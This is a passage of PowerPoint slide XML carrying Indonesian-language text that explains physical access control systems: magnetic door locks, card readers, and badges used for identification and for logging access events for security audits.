              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penguncian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>magnetik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kartu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>listrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (PACS) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fasilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gedung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs. PACS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beroperasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kombinasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kartu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kartu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, panel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PACS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencatatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berharga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berfungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bentuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menampilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemegang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> nama, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jabatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>foto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>individu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fasilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di area yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berharga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> audit dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>investigasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PACS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencatat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peristiwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyelidiki</a:t>
            </a:r>
            <a:r>
